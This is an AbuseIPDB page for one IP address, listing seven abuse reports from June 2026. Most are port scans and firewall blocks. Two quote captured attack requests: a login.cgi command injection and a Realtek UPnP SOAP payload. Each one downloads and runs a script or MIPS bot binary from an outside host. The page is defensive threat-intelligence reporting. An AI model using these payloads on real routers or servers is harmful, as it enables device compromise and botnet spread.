AbuseIPDB » 192.204.45.226
192.204.45.226 was found in our database!
This IP was reported 7 times. Confidence of
Abuse
is 44% : ?
ISP
NTT DATA
Usage Type
Fixed Line ISP
ASN
AS2914
Domain Name
nttdata.com
Country
πΊπΈ
United States of America
City
Los Angeles, California
IP info including ISP, Usage Type, and Location provided
by IPInfo . Updated weekly.
IP Abuse Reports for 192.204.45.226 :
This IP address has been reported a total of
7
times from
7 distinct
sources.
192.204.45.226 was first reported on
June 18th 2026 , and the most recent report was
1 day ago .
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Reporter
IoA Timestamp (UTC)
Comment
Categories
π¦πΉ
urnilxfgbez
2026-06-19 22:45:00
(1 day ago)
Last 24 Hours suspicious: (DPT=445|DPT=3389|DPT=22|DPT=3306|DPT=8080|DPT=23|DPT=5900|DPT=1433)
Port Scan
π©πͺ
Mirage F1
2026-06-19 06:26:00
(2 days ago)
192.204.45.226 - - [19/Jun/2026:01:07:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://10
9.1 ...
show more
192.204.45.226 - - [19/Jun/2026:01:07:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://10
9.104.153.60/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1"
show less
Hacking
π©πͺ
defkev
2026-06-18 23:52:58
(2 days ago)
Attempted Administrator Privilege Gain, Attempted User Privilege Gain
Hacking
π¦πΉ
centurion
2026-06-18 21:06:50
(3 days ago)
Blocked by UFW on ns03 [8080/tcp] Source port: 29401 TTL: 49 Packet length: 40 TOS: 0x00 This repor ...
show more
Blocked by UFW on ns03 [8080/tcp] Source port: 29401 TTL: 49 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter
show less
Port Scan
Web App Attack
π©πͺ
_ArminS_
2026-06-18 20:33:14
(3 days ago)
SP-Scan 37674:37215 detected 2026.06.18 22:33:14
blocked until 2026.08.07 15:36:01
Port Scan
π«π·
hghosting
2026-06-18 15:51:58
(3 days ago)
CrowdSec auto-report: crowdsecurity/suricata-major-severity β 1 events
Brute-Force
SSH
π¬π§
gbzret4d
2026-06-18 12:39:49
(3 days ago)
Honeypot [uk-production01]: HTTP/1.1 request on 52869
POST /picdesc.xml
User-Agent: Mozilla/4.0 (co ...
show more
Honeypot [uk-production01]: HTTP/1.1 request on 52869
POST /picdesc.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Accept-Encoding: gzip, deflate
POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP
show less
Hacking
Bad Web Bot
Showing 1 to
7
of 7 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown π©
Recently Reported IPs: